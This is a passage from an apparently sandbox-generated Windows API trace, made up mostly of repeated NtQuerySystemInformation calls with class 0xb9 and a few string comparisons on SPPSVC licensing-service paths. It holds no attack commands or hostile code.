ResultLength=0x0) [0282.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0282.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0282.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0282.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0282.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0282.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0282.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0282.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0282.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0282.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0282.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0282.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0282.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0282.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0282.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0282.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0282.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0282.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0282.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0282.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0282.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0282.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0282.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0282.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0282.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0282.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0282.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0282.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0282.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0282.942] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0282.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0282.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0282.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0282.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0282.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0282.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0282.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cca0, Length=0x28, ResultLength=0x0) [0282.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0282.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0282.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0282.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0282.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0282.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0282.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0282.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0282.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0282.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0282.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0282.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0282.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0282.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0282.963] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0282.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0282.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0282.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0282.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0282.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0282.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0282.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cca0, Length=0x28, ResultLength=0x0) [0282.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0282.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0282.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0282.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0282.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0282.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0282.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0282.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0282.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0282.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0282.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0282.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0282.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0282.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x28, ResultLength=0x0) [0282.983] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0282.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0282.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0282.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x28, ResultLength=0x0) [0282.984] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0282.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.984] 